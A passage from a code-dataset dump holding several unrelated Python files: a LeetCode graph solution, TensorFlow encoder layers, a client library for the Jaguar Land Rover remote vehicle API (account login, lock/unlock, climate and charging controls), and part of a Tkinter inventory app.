Frame)\n","repo_name":"vivianel/DarePy-SANS","sub_path":"codes/integration.py","file_name":"integration.py","file_ext":"py","file_size_in_byte":10616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"32070649049","text":"import heapq\nfrom collections import deque\nfrom typing import List\n\n\nclass Solution:\n \"\"\"\n You have an undirected, connected graph of n nodes labeled from 0 to n - 1. You are given an array graph where graph[i] is a list of all the nodes connected with node i by an edge.\n\n Return the length of the shortest path that visits every node. 
You may start and stop at any node, you may revisit nodes multiple times, and you may reuse edges.\n\n Example 1:\n\n Input: graph = [[1,2,3],[0],[0],[0]]\n Output: 4\n Explanation: One possible path is [1,0,2,0,3]\n Example 2:\n\n Input: graph = [[1],[0,2,4],[1,3,4],[2],[1,2]]\n Output: 4\n Explanation: One possible path is [0,1,4,2,3]\n \"\"\"\n def shortestPathLength1(self, graph: List[List[int]]) -> int:\n n = len(graph)\n if n == 1:\n return 0\n que = []\n visited = set()\n for node, _ in enumerate(graph):\n state = 1 << node\n heapq.heappush(que, (0, node, state))\n visited.add((node, state))\n target = (1 << n) - 1\n\n while que:\n dis, node, state = heapq.heappop(que)\n for nei in graph[node]:\n nei_state = 1 << nei | state\n if nei_state == target:\n return dis + 1\n if (nei, nei_state) in visited:\n continue\n heapq.heappush(que, (dis + 1, nei, nei_state))\n visited.add((nei, nei_state))\n \n def shortestPathLength(self, graph: List[List[int]]) -> int:\n n = len(graph)\n final_mask = (1 << n) - 1\n\n que = deque([[i, 1 << i, 0] for i in range(n)])\n visited = set((i, 1 << i) for i in range(n))\n while que:\n node, mask, steps = que.popleft()\n if mask == final_mask:\n return steps\n for neighbor in graph[node]:\n new_mask = mask | (1 << neighbor)\n if (neighbor, new_mask) not in visited:\n visited.add((neighbor, new_mask))\n que.append([neighbor, new_mask, steps + 1])\n return -1\n\n","repo_name":"benbendaisy/CommunicationCodes","sub_path":"python_module/examples/847_Shortest_Path_Visiting_All_Nodes.py","file_name":"847_Shortest_Path_Visiting_All_Nodes.py","file_ext":"py","file_size_in_byte":2076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"21595466156","text":"import tensorflow as tf\nfrom model.module import transformer\n\n\n# prac 1\nclass CNNBasedEncoder(tf.keras.layers.Layer):\n def __init__(self, args):\n super(CNNBasedEncoder, self).__init__()\n self.cnn_layers = []\n for i in range(args.encoder_n_layer):\n self.cnn_layers.append(\n tf.keras.layers.Conv1D(args.dim_embedding, args.cnn_kernel_size, padding='same', activation='relu'\n , name='cnn_layer_{}'.format(str(i)))\n )\n\n def call(self, inputs):\n out = inputs\n\n for cnn_layer in self.cnn_layers:\n out = cnn_layer(out)\n\n return out\n\n\n# prac 1\nclass LSTMBasedEncoder(tf.keras.layers.Layer):\n def __init__(self, args):\n super(LSTMBasedEncoder, self).__init__()\n self.lstm_layers = []\n for i in range(args.encoder_n_layer):\n self.lstm_layers.append(\n tf.keras.layers.LSTM(args.dim_embedding, return_sequences=True, name='lstm_layer_{}'.format(str(i)))\n )\n\n def call(self, inputs):\n out = inputs\n\n for lstm_layer in self.lstm_layers:\n out = lstm_layer(out)\n\n return out\n\n\n# prac_1\n# Bidirectional : https://www.tensorflow.org/api_docs/python/tf/keras/layers/Bidirectional\nclass BiLSTMBasedEncoder(tf.keras.layers.Layer):\n def __init__(self, args):\n super(BiLSTMBasedEncoder, self).__init__()\n self.lstm_layers = []\n for i in range(args.encoder_n_layer):\n # Fill in the blank\n print('Fill in the blank')\n\n def call(self, inputs):\n out = inputs\n\n for lstm_layer in self.lstm_layers:\n out = lstm_layer(out)\n\n return out\n\n\nclass TransformerBasedEncoder(tf.keras.layers.Layer):\n def __init__(self, args):\n super(TransformerBasedEncoder, self).__init__()\n self.transformer_layers = []\n for i in range(args.encoder_n_layer):\n self.transformer_layers.append(\n transformer.TransformerEncoderLayer(embed_dim=args.dim_embedding,\n num_heads=args.encoder_n_head,\n 
ff_dim=args.dim_embedding)\n )\n\n def call(self, inputs):\n x = inputs\n x_q, x_k, x_v = x, x, x\n\n for transformer_layer in self.transformer_layers:\n x_q = transformer_layer(x_q, x_k, x_v)\n x_k = x_q\n x_v = x_q\n\n return x_q\n","repo_name":"jhlee17139/TFNLP_prac","sub_path":"model/module/encoder.py","file_name":"encoder.py","file_ext":"py","file_size_in_byte":2490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"16392554170","text":"\"\"\" Simple Python class to access the JLR Remote Car API\nhttps://github.com/ardevd/jlrpy\n\"\"\"\n\nfrom urllib.request import Request, build_opener\n\nimport json\nimport datetime\nimport calendar\nimport uuid\nimport sys\nimport logging\n\nlogger = logging.getLogger('jlrpy')\nlogger.setLevel(logging.INFO)\n\nch = logging.StreamHandler(sys.stdout)\nch.setFormatter(logging.Formatter(\"%(asctime)s - %(levelname)s - %(message)s\"))\nlogger.addHandler(ch)\nlogger.propagate = False\n\nIFAS_BASE_URL = \"https://ifas.prod-row.jlrmotor.com/ifas/jlr\"\nIFOP_BASE_ULR = \"https://ifop.prod-row.jlrmotor.com/ifop/jlr\"\nIF9_BASE_URL = \"https://if9.prod-row.jlrmotor.com/if9/jlr\"\n\n\nclass Connection(object):\n \"\"\"Connection to the JLR Remote Car API\"\"\"\n\n def __init__(self,\n email='',\n password='',\n device_id='',\n refresh_token=''):\n \"\"\"Init the connection object\n\n The email address and password associated with your Jaguar InControl account are required.\n A device Id can optionally be specified. If not one will be generated at runtime.\n A refresh token can be supplied for authentication instead of a password\n \"\"\"\n self.email = email\n\n if device_id:\n self.device_id = device_id\n else:\n self.device_id = str(uuid.uuid4())\n\n if refresh_token:\n self.oauth = {\n \"grant_type\": \"refresh_token\",\n \"refresh_token\": refresh_token}\n else:\n self.oauth = {\n \"grant_type\": \"password\",\n \"username\": email,\n \"password\": password}\n\n self.expiration = 0 # force credential refresh\n\n self.connect()\n\n self.vehicles = []\n try:\n for v in self.get_vehicles(self.head)['vehicles']:\n self.vehicles.append(Vehicle(v, self))\n except TypeError:\n logger.error(\"No vehicles associated with this account\")\n\n def get(self, command, url, headers):\n \"\"\"GET data from API\"\"\"\n return self.post(command, url, headers, None)\n\n def post(self, command, url, headers, data=None):\n \"\"\"POST data to API\"\"\"\n now = calendar.timegm(datetime.datetime.now().timetuple())\n logger.debug(url)\n if now > self.expiration:\n # Auth expired, reconnect\n self.connect()\n return self.__open(\"%s/%s\" % (url, command), headers=headers, data=data)\n\n def connect(self):\n logger.info(\"Connecting...\")\n auth = self.__authenticate(data=self.oauth)\n self.__register_auth(auth)\n self.__set_header(auth['access_token'])\n logger.info(\"[+] authenticated\")\n self.__register_device_and_log_in()\n\n def __register_device_and_log_in(self):\n self.__register_device(self.head)\n logger.info(\"1/2 device id registered\")\n self.__login_user(self.head)\n logger.info(\"2/2 user logged in, user id retrieved\")\n\n def __open(self, url, headers=None, data=None):\n req = Request(url, headers=headers)\n if data:\n req.data = bytes(json.dumps(data), encoding=\"utf8\")\n\n opener = build_opener()\n resp = opener.open(req)\n charset = resp.info().get('charset', 'utf-8')\n resp_data = resp.read().decode(charset)\n if resp_data:\n return json.loads(resp_data)\n else:\n return None\n\n def 
__register_auth(self, auth):\n self.access_token = auth['access_token']\n now = calendar.timegm(datetime.datetime.now().timetuple())\n self.expiration = now + int(auth['expires_in'])\n self.auth_token = auth['authorization_token']\n self.refresh_token = auth['refresh_token']\n\n def __set_header(self, access_token):\n \"\"\"Set HTTP header fields\"\"\"\n self.head = {\n \"Authorization\": \"Bearer %s\" % access_token,\n \"X-Device-Id\": self.device_id,\n \"Content-Type\": \"application/json\"}\n\n def __authenticate(self, data=None):\n \"\"\"Raw urlopen command to the auth url\"\"\"\n url = \"%s/tokens\" % IFAS_BASE_URL\n auth_headers = {\n \"Authorization\": \"Basic YXM6YXNwYXNz\",\n \"Content-Type\": \"application/json\",\n \"X-Device-Id\": self.device_id}\n\n return self.__open(url, auth_headers, data)\n\n def __register_device(self, headers=None):\n \"\"\"Register the device Id\"\"\"\n url = \"%s/users/%s/clients\" % (IFOP_BASE_ULR, self.email)\n data = {\n \"access_token\": self.access_token,\n \"authorization_token\": self.auth_token,\n \"expires_in\": \"86400\",\n \"deviceID\": self.device_id\n }\n\n return self.__open(url, headers, data)\n\n def __login_user(self, headers=None):\n \"\"\"Login the user\"\"\"\n url = \"%s/users?loginName=%s\" % (IF9_BASE_URL, self.email)\n user_login_header = headers.copy()\n user_login_header[\"Accept\"] = \"application/vnd.wirelesscar.ngtp.if9.User-v3+json\"\n\n user_data = self.__open(url, user_login_header)\n self.user_id = user_data['userId']\n return user_data\n\n def refresh_tokens(self):\n \"\"\"Refresh tokens.\"\"\"\n self.oauth = {\n \"grant_type\": \"refresh_token\",\n \"refresh_token\": self.refresh_token}\n\n auth = self.__authenticate(self.oauth)\n self.__register_auth(auth)\n self.__set_header(auth['access_token'])\n logger.info(\"[+] Tokens refreshed\")\n self.__register_device_and_log_in()\n\n def get_vehicles(self, headers):\n \"\"\"Get vehicles for user\"\"\"\n url = \"%s/users/%s/vehicles?primaryOnly=true\" % (IF9_BASE_URL, self.user_id)\n return self.__open(url, headers)\n\n def get_user_info(self):\n \"\"\"Get user information\"\"\"\n return self.get(self.user_id, \"%s/users\" % IF9_BASE_URL, self.head)\n\n def update_user_info(self, user_info_data):\n \"\"\"Update user information\"\"\"\n headers = self.head.copy()\n headers[\"Content-Type\"] = \"application/vnd.wirelesscar.ngtp.if9.User-v3+json; charset=utf-8\"\n return self.post(self.user_id, \"%s/users\" % IF9_BASE_URL, headers, user_info_data)\n\n def reverse_geocode(self, lat, lon):\n \"\"\"Get geocode information\"\"\"\n return self.get(\"en\",\n \"%s/geocode/reverse/{0:f}/{1:f}\".format(lat, lon) % IF9_BASE_URL,\n self.head)\n\n\nclass Vehicle(dict):\n \"\"\"Vehicle class.\n\n You can request data or send commands to vehicle. 
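A minimal usage sketch (the credentials below are placeholders, not real values):\n\n c = Connection('user@example.com', 'password')\n v = c.vehicles[0]\n v.get_status()\n\n 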
Consult the JLR API documentation for details\n \"\"\"\n\n def __init__(self, data, connection):\n \"\"\"Initialize the vehicle class.\"\"\"\n\n super().__init__(data)\n self.connection = connection\n self.vin = data['vin']\n\n def get_attributes(self):\n \"\"\"Get vehicle attributes\"\"\"\n headers = self.connection.head.copy()\n headers[\"Accept\"] = \"application/vnd.ngtp.org.VehicleAttributes-v3+json\"\n result = self.get('attributes', headers)\n return result\n\n def get_status(self, key=None):\n \"\"\"Get vehicle status\"\"\"\n headers = self.connection.head.copy()\n headers[\"Accept\"] = \"application/vnd.ngtp.org.if9.healthstatus-v2+json\"\n result = self.get('status', headers)\n\n if key:\n return {d['key']: d['value'] for d in result['vehicleStatus']}[key]\n\n return result\n\n def get_health_status(self):\n \"\"\"Get vehicle health status\"\"\"\n headers = self.connection.head.copy()\n headers[\"Accept\"] = \"application/vnd.wirelesscar.ngtp.if9.ServiceStatus-v4+json\"\n headers[\"Content-Type\"] = \"application/vnd.wirelesscar.ngtp.if9.StartServiceConfiguration-v3+json; charset=utf-8\"\n\n vhs_data = self._authenticate_vhs()\n\n return self.post('healthstatus', headers, vhs_data)\n\n def get_departure_timers(self):\n \"\"\"Get vehicle departure timers\"\"\"\n headers = self.connection.head.copy()\n headers[\"Accept\"] = \"application/vnd.wirelesscar.ngtp.if9.DepartureTimerSettings-v1+json\"\n return self.get(\"departuretimers\", headers)\n\n def get_wakeup_time(self):\n \"\"\"Get configured wakeup time for vehicle\"\"\"\n headers = self.connection.head.copy()\n headers[\"Accept\"] = \"application/vnd.wirelesscar.ngtp.if9.VehicleWakeupTime-v2+json\"\n return self.get(\"wakeuptime\", headers)\n\n def get_subscription_packages(self):\n \"\"\"Get vehicle subscription packages\"\"\"\n result = self.get('subscriptionpackages', self.connection.head)\n return result\n\n def get_trips(self, count=1000):\n \"\"\"Get the most recent trips (default 1000) associated with vehicle\"\"\"\n headers = self.connection.head.copy()\n headers[\"Accept\"] = \"application/vnd.ngtp.org.triplist-v2+json\"\n return self.get('trips?count=%d' % count, headers)\n\n def get_trip(self, trip_id):\n \"\"\"Get info on a specific trip\"\"\"\n return self.get('trips/%s/route?pageSize=1000&page=0' % trip_id, self.connection.head)\n\n def get_position(self):\n \"\"\"Get current vehicle position\"\"\"\n return self.get('position', self.connection.head)\n\n def get_service_status(self, service_id):\n \"\"\"Get service status\"\"\"\n headers = self.connection.head.copy()\n headers[\"Accept\"] = \"application/vnd.wirelesscar.ngtp.if9.ServiceStatus-v4+json\"\n return self.get('services/%s' % service_id, headers)\n\n def get_services(self):\n \"\"\"Get active services\"\"\"\n headers = self.connection.head.copy()\n return self.get(\"services\", headers)\n\n def get_rcc_target_value(self):\n \"\"\"Get Remote Climate Target Value\"\"\"\n headers = self.connection.head.copy()\n return self.get('settings/ClimateControlRccTargetTemp', headers)\n\n def set_attributes(self, nickname, registration_number):\n \"\"\"Set vehicle nickname and registration number\"\"\"\n attributes_data = {\"nickname\": nickname,\n \"registrationNumber\": registration_number}\n return self.post(\"attributes\", self.connection.head, attributes_data)\n\n def lock(self, pin):\n \"\"\"Lock vehicle. 
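For example, vehicle.lock('1234') with a hypothetical 4-digit PIN. 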
Requires personal PIN for authentication\"\"\"\n headers = self.connection.head.copy()\n headers[\"Content-Type\"] = \"application/vnd.wirelesscar.ngtp.if9.StartServiceConfiguration-v2+json\"\n rdl_data = self.authenticate_rdl(pin)\n\n return self.post(\"lock\", headers, rdl_data)\n\n def unlock(self, pin):\n \"\"\"Unlock vehicle. Requires personal PIN for authentication\"\"\"\n headers = self.connection.head.copy()\n headers[\"Content-Type\"] = \"application/vnd.wirelesscar.ngtp.if9.StartServiceConfiguration-v2+json\"\n rdu_data = self.authenticate_rdu(pin)\n\n return self.post(\"unlock\", headers, rdu_data)\n\n def reset_alarm(self, pin):\n \"\"\"Reset vehicle alarm\"\"\"\n headers = self.connection.head.copy()\n headers[\"Content-Type\"] = \"application/vnd.wirelesscar.ngtp.if9.StartServiceConfiguration-v3+json; charset=utf-8\"\n headers[\"Accept\"] = \"application/vnd.wirelesscar.ngtp.if9.ServiceStatus-v4+json\"\n aloff_data = self.authenticate_aloff(pin)\n\n return self.post(\"unlock\", headers, aloff_data)\n\n def honk_blink(self):\n \"\"\"Sound the horn and blink lights\"\"\"\n headers = self.connection.head.copy()\n headers[\"Accept\"] = \"application/vnd.wirelesscar.ngtp.if9.ServiceStatus-v4+json\"\n headers[\"Content-Type\"] = \"application/vnd.wirelesscar.ngtp.if9.StartServiceConfiguration-v3+json; charset=utf-8\"\n\n hblf_data = self.authenticate_hblf()\n return self.post(\"honkBlink\", headers, hblf_data)\n\n def remote_engine_start(self, pin, target_value):\n \"\"\"Start Remote Engine preconditioning\"\"\"\n headers = self.connection.head.copy()\n headers[\"Content-Type\"] = \"application/vnd.wirelesscar.ngtp.if9.StartServiceConfiguration-v2+json\"\n self.set_rcc_target_value(pin, target_value)\n reon_data = self.authenticate_reon(pin)\n\n return self.post(\"engineOn\", headers, reon_data)\n\n def remote_engine_stop(self, pin):\n \"\"\"Stop Remote Engine preconditioning\"\"\"\n headers = self.connection.head.copy()\n headers[\"Content-Type\"] = \"application/vnd.wirelesscar.ngtp.if9.StartServiceConfiguration-v2+json\"\n reoff_data = self.authenticate_reoff(pin)\n\n return self.post(\"engineOff\", headers, reoff_data)\n\n def set_rcc_target_value(self, pin, target_value):\n \"\"\"Set Remote Climate Target Value (value between 31-57, 31 is LO 57 is HOT)\"\"\"\n headers = self.connection.head.copy()\n self.enable_provisioning_mode(pin)\n service_parameters = {\"key\": \"ClimateControlRccTargetTemp\",\n \"value\": \"%s\" % str(target_value),\n \"applied\": 1}\n self.post(\"settings\", headers, service_parameters)\n\n def preconditioning_start(self, target_temp):\n \"\"\"Start pre-conditioning for specified temperature (celsius)\"\"\"\n service_parameters = [{\"key\": \"PRECONDITIONING\",\n \"value\": \"START\"},\n {\"key\": \"TARGET_TEMPERATURE_CELSIUS\",\n \"value\": \"%s\" % target_temp}]\n\n return self._preconditioning_control(service_parameters)\n\n def preconditioning_stop(self):\n \"\"\"Stop climate preconditioning\"\"\"\n service_parameters = [{\"key\": \"PRECONDITIONING\",\n \"value\": \"STOP\"}]\n return self._preconditioning_control(service_parameters)\n\n def climate_prioritize(self, priority):\n \"\"\"Optimize climate controls for comfort or range\"\"\"\n service_parameters = [{\"key\": \"PRIORITY_SETTING\",\n \"value\": \"%s\" % priority}]\n return self._preconditioning_control(service_parameters)\n\n def _preconditioning_control(self, service_parameters):\n \"\"\"Control the climate preconditioning\"\"\"\n headers = self.connection.head.copy()\n headers[\"Accept\"] 
= \"application/vnd.wirelesscar.ngtp.if9.ServiceStatus-v5+json\"\n headers[\"Content-Type\"] = \"application/vnd.wirelesscar.ngtp.if9.PhevService-v1+json; charset=utf-8\"\n\n ecc_data = self.authenticate_ecc()\n ecc_data['serviceParameters'] = service_parameters\n\n return self.post(\"preconditioning\", headers, ecc_data)\n\n def charging_stop(self):\n \"\"\"Stop charging\"\"\"\n service_parameters = [{\"key\": \"CHARGE_NOW_SETTING\",\n \"value\": \"FORCE_OFF\"}]\n\n return self._charging_profile_control(\"serviceParameters\", service_parameters)\n\n def charging_start(self):\n \"\"\"Start charging\"\"\"\n service_parameters = [{\"key\": \"CHARGE_NOW_SETTING\",\n \"value\": \"FORCE_ON\"}]\n\n return self._charging_profile_control(\"serviceParameters\", service_parameters)\n\n def set_max_soc(self, max_charge_level):\n \"\"\"Set max state of charge in percentage\"\"\"\n service_parameters = [{\"key\": \"SET_PERMANENT_MAX_SOC\",\n \"value\": max_charge_level}]\n\n return self._charging_profile_control(\"serviceParameters\", service_parameters)\n\n def set_one_off_max_soc(self, max_charge_level):\n \"\"\"Set one off max state of charge in percentage\"\"\"\n service_parameters = [{\"key\": \"SET_ONE_OFF_MAX_SOC\",\n \"value\": max_charge_level}]\n\n return self._charging_profile_control(\"serviceParameters\", service_parameters)\n\n def add_departure_timer(self, index, year, month, day, hour, minute):\n \"\"\"Add a single departure timer with the specified index\"\"\"\n departure_timer_setting = {\"timers\": [\n {\"departureTime\": {\"hour\": hour, \"minute\": minute},\n \"timerIndex\": index, \"timerTarget\":\n {\"singleDay\": {\"day\": day, \"month\": month, \"year\": year}},\n \"timerType\": {\"key\": \"BOTHCHARGEANDPRECONDITION\", \"value\": True}}]}\n\n return self._charging_profile_control(\"departureTimerSetting\", departure_timer_setting)\n\n def add_repeated_departure_timer(self, index, schedule, hour, minute):\n \"\"\"Add repeated departure timer.\"\"\"\n departure_timer_setting = {\"timers\": [\n {\"departureTime\": {\"hour\": hour, \"minute\": minute},\n \"timerIndex\": index, \"timerTarget\":\n {\"repeatSchedule\": schedule},\n \"timerType\": {\"key\": \"BOTHCHARGEANDPRECONDITION\", \"value\": True}}]}\n\n return self._charging_profile_control(\"departureTimerSetting\", departure_timer_setting)\n\n def delete_departure_timer(self, index):\n \"\"\"Delete a single departure timer associated with the specified index\"\"\"\n departure_timer_setting = {\"timers\": [{\"timerIndex\": index}]}\n\n return self._charging_profile_control(\"departureTimerSetting\", departure_timer_setting)\n\n def add_charging_period(self, index, schedule, hour_from, minute_from, hour_to, minute_to):\n \"\"\"Add charging period\"\"\"\n tariff_settings = {\"tariffs\": [\n {\"tariffIndex\": index, \"tariffDefinition\": {\"enabled\": True,\n \"repeatSchedule\": schedule,\n \"tariffZone\": [\n {\"zoneName\": \"TARIFF_ZONE_A\",\n \"bandType\": \"PEAK\",\n \"endTime\": {\n \"hour\": hour_from,\n \"minute\": minute_from}},\n {\"zoneName\": \"TARIFF_ZONE_B\",\n \"bandType\": \"OFFPEAK\",\n \"endTime\": {\"hour\": hour_to,\n \"minute\": minute_to}},\n {\"zoneName\": \"TARIFF_ZONE_C\",\n \"bandType\": \"PEAK\",\n \"endTime\": {\"hour\": 0,\n \"minute\": 0}}]}}]}\n\n return self._charging_profile_control(\"tariffSettings\", tariff_settings)\n\n def _charging_profile_control(self, service_parameter_key, service_parameters):\n \"\"\"Charging profile API\"\"\"\n headers = self.connection.head.copy()\n headers[\"Accept\"] = 
\"application/vnd.wirelesscar.ngtp.if9.ServiceStatus-v5+json\"\n headers[\"Content-Type\"] = \"application/vnd.wirelesscar.ngtp.if9.PhevService-v1+json; charset=utf-8\"\n\n cp_data = self.authenticate_cp()\n cp_data[service_parameter_key] = service_parameters\n\n return self.post(\"chargeProfile\", headers, cp_data)\n\n def set_wakeup_time(self, wakeup_time):\n \"\"\"Set the wakeup time for the specified time (epoch milliseconds)\"\"\"\n swu_data = self.authenticate_swu()\n swu_data[\"serviceCommand\"] = \"START\"\n swu_data[\"startTime\"] = wakeup_time\n return self._swu(swu_data)\n\n def delete_wakeup_time(self):\n \"\"\"Stop the wakeup time\"\"\"\n swu_data = self.authenticate_swu()\n swu_data[\"serviceCommand\"] = \"END\"\n return self._swu(swu_data)\n\n def _swu(self, swu_data):\n \"\"\"Set the wakeup time for the specified time (epoch milliseconds)\"\"\"\n headers = self.connection.head.copy()\n headers[\"Accept\"] = \"application/vnd.wirelesscar.ngtp.if9.ServiceStatus-v3+json\"\n headers[\"Content-Type\"] = \"application/vnd.wirelesscar.ngtp.if9.StartServiceConfiguration-v3+json; charset=utf-8\"\n return self.post(\"swu\", headers, swu_data)\n\n def enable_provisioning_mode(self, pin):\n \"\"\"Enable provisioning mode \"\"\"\n self._prov_command(pin, None, \"provisioning\")\n\n def enable_service_mode(self, pin, expiration_time):\n \"\"\"Enable service mode. Will disable at the specified time (epoch millis)\"\"\"\n return self._prov_command(pin, expiration_time, \"protectionStrategy_serviceMode\")\n\n def enable_transport_mode(self, pin, expiration_time):\n \"\"\"Enable transport mode. Will be disabled at the specified time (epoch millis)\"\"\"\n return self._prov_command(pin, expiration_time, \"protectionStrategy_transportMode\")\n\n def enable_privacy_mode(self, pin):\n \"\"\"Enable privacy mode. Will disable journey logging\"\"\"\n return self._prov_command(pin, None, \"privacySwitch_on\")\n\n def disable_privacy_mode(self, pin):\n \"\"\"Disable privacy mode. Will enable journey logging\"\"\"\n return self._prov_command(pin, None, \"privacySwitch_off\")\n\n def _prov_command(self, pin, expiration_time, mode):\n \"\"\"Send prov endpoint commands. 
Used for service/transport/privacy mode\"\"\"\n headers = self.connection.head.copy()\n headers[\"Content-Type\"] = \"application/vnd.wirelesscar.ngtp.if9.StartServiceConfiguration-v3+json\"\n prov_data = self.authenticate_prov(pin)\n\n prov_data[\"serviceCommand\"] = mode\n prov_data[\"startTime\"] = None\n prov_data[\"endTime\"] = expiration_time\n\n return self.post(\"prov\", headers, prov_data)\n\n def _authenticate_vhs(self):\n \"\"\"Authenticate to vhs and get token\"\"\"\n return self._authenticate_empty_pin_protected_service(\"VHS\")\n\n def _authenticate_empty_pin_protected_service(self, service_name):\n data = {\n \"serviceName\": service_name,\n \"pin\": \"\"}\n headers = self.connection.head.copy()\n headers[\"Content-Type\"] = \"application/vnd.wirelesscar.ngtp.if9.AuthenticateRequest-v2+json; charset=utf-8\"\n\n return self.post(\"users/%s/authenticate\" % self.connection.user_id, headers, data)\n\n def authenticate_hblf(self):\n \"\"\"Authenticate to hblf\"\"\"\n return self._authenticate_vin_protected_service(\"HBLF\")\n\n def authenticate_ecc(self):\n \"\"\"Authenticate to ecc\"\"\"\n return self._authenticate_vin_protected_service(\"ECC\")\n\n def authenticate_cp(self):\n \"\"\"Authenticate to cp\"\"\"\n return self._authenticate_vin_protected_service(\"CP\")\n\n def authenticate_swu(self):\n \"\"\"Authenticate to swu\"\"\"\n return self._authenticate_empty_pin_protected_service(\"SWU\")\n\n def _authenticate_vin_protected_service(self, service_name):\n \"\"\"Authenticate to specified service and return associated token\"\"\"\n data = {\n \"serviceName\": \"%s\" % service_name,\n \"pin\": \"%s\" % self.vin[-4:]}\n headers = self.connection.head.copy()\n headers[\"Content-Type\"] = \"application/vnd.wirelesscar.ngtp.if9.AuthenticateRequest-v2+json; charset=utf-8\"\n\n return self.post(\"users/%s/authenticate\" % self.connection.user_id, headers, data)\n\n def authenticate_rdl(self, pin):\n \"\"\"Authenticate to rdl\"\"\"\n return self._authenticate_pin_protected_service(pin, \"RDL\")\n\n def authenticate_rdu(self, pin):\n \"\"\"Authenticate to rdu\"\"\"\n return self._authenticate_pin_protected_service(pin, \"RDU\")\n\n def authenticate_aloff(self, pin):\n \"\"\"Authenticate to aloff\"\"\"\n return self._authenticate_pin_protected_service(pin, \"ALOFF\")\n\n def authenticate_reon(self, pin):\n \"\"\"Authenticate to reon\"\"\"\n return self._authenticate_pin_protected_service(pin, \"REON\")\n\n def authenticate_reoff(self, pin):\n \"\"\"Authenticate to reoff\"\"\"\n return self._authenticate_pin_protected_service(pin, \"REOFF\")\n\n def authenticate_prov(self, pin):\n \"\"\"Authenticate to PROV service\"\"\"\n return self._authenticate_pin_protected_service(pin, \"PROV\")\n\n def _authenticate_pin_protected_service(self, pin, service_name):\n \"\"\"Authenticate to specified service with the provided PIN\"\"\"\n data = {\n \"serviceName\": \"%s\" % service_name,\n \"pin\": \"%s\" % pin}\n headers = self.connection.head.copy()\n headers[\"Content-Type\"] = \"application/vnd.wirelesscar.ngtp.if9.AuthenticateRequest-v2+json; charset=utf-8\"\n\n return self.post(\"users/%s/authenticate\" % self.connection.user_id, headers, data)\n\n def post(self, command, headers, data):\n \"\"\"Utility command to post data to VHS\"\"\"\n return self.connection.post(command, '%s/vehicles/%s' % (IF9_BASE_URL, self.vin),\n headers, data)\n\n def get(self, command, headers):\n \"\"\"Utility command to get vehicle data from API\"\"\"\n return self.connection.get(command, '%s/vehicles/%s' % 
(IF9_BASE_URL, self.vin), headers)\n","repo_name":"smar000/jlr2mqtt","sub_path":"jlrpy.py","file_name":"jlrpy.py","file_ext":"py","file_size_in_byte":24760,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"34713530847","text":"from itertools import count\nfrom os import X_OK\nfrom tkinter import *\nfrom tkinter import ttk\nfrom datetime import *\nfrom time import strftime\nfrom PIL import ImageTk, Image\nfrom tkcalendar import DateEntry\nimport sqlite3\n# from functions import *\nimport signin\nimport dashboard\nimport products\nimport sales\nimport customers\nimport addproduct\nimport addcustomer\nimport addsales\n\nclass Products:\n def __init__(self, window):\n self.window = window\n width = 800\n height = 500\n sw = self.window.winfo_screenwidth()\n sh = self.window.winfo_screenheight()\n x = (sw/5)\n y = (sh/11)\n self.window.geometry(f'{width}x{height}+{int(x)}+{int(y)}')\n self.window.title('TCP Management | Products page')\n self.window.configure(bg='#f7f3f2')\n self.window.wm_iconbitmap('FMCG.ico')\n self.window.resizable(0, 0)\n\n # Database\n def SalesData():\n db = sqlite3.connect('GLBL.db')\n cursor = db.cursor()\n cursor.execute('select * from products')\n records = cursor.fetchall()\n \n global count\n count = 0\n for record in records:\n SalesView.insert(parent='', index='end', iid=count, values=(record[0], \n record[1], record[2], record[3])) \n count = count + 1\n\n db.commit()\n db.close()\n\n\n\n # First Frame & Menu\n MenuFrame = Frame(window)\n MenuFrame.pack(fill=X, expand='no')\n\n Menu = Button(MenuFrame, text = 'Overview', bd=0, cursor='hand2', activebackground='green', activeforeground='white', font=('roboto', 9, 'bold'), command=self.dashb)\n Menu.grid(row=0, column=0, padx=5, pady=10)\n DivLine = Frame(MenuFrame, height=15, width=1, bg='red')\n DivLine.grid(row=0,column=1, pady=10)\n\n Menu2 = Button(MenuFrame, text = 'Products', bd=0, cursor='hand2', activebackground='green', activeforeground='white', font=('roboto', 9, 'bold'), command=self.prod)\n Menu2.grid(row=0, column=2, padx=5, pady=10)\n DivLine = Frame(MenuFrame, height=15, width=1, bg='red')\n DivLine.grid(row=0,column=3, pady=10)\n\n Menu3 = Button(MenuFrame, text = 'Sales', bd=0, cursor='hand2', activebackground='green', activeforeground='white', font=('roboto', 9, 'bold'), command=self.saless)\n Menu3.grid(row=0, column=4, padx=5, pady=10)\n DivLine = Frame(MenuFrame, height=15, width=1, bg='red')\n DivLine.grid(row=0,column=5, pady=10)\n\n Menu4 = Button(MenuFrame, text = 'Customers', bd=0, cursor='hand2', activebackground='green', activeforeground='white', font=('roboto', 9, 'bold'), command=self.cus)\n Menu4.grid(row=0, column=6, padx=5, pady=10)\n DivLine = Frame(MenuFrame, height=15, width=1, bg='red')\n DivLine.grid(row=0,column=7, pady=10)\n\n Menu5 = Button(MenuFrame, text = 'Vendors', bd=0, cursor='hand2', activebackground='green', activeforeground='white', font=('roboto', 9, 'bold'))\n Menu5.grid(row=0, column=8, padx=5, pady=10)\n DivLine = Frame(MenuFrame, height=15, width=1, bg='red')\n DivLine.grid(row=0,column=9, pady=10)\n\n Menu6 = Button(MenuFrame, text = 'Inventory', bd=0, cursor='hand2', activebackground='green', activeforeground='white', font=('roboto', 9, 'bold'))\n Menu6.grid(row=0, column=10, padx=5, pady=10)\n DivLine = Frame(MenuFrame, height=15, width=1, bg='red')\n DivLine.grid(row=0,column=11, pady=10)\n\n Menu7 = Button(MenuFrame, text = 'Expenses', bd=0, cursor='hand2', activebackground='green', 
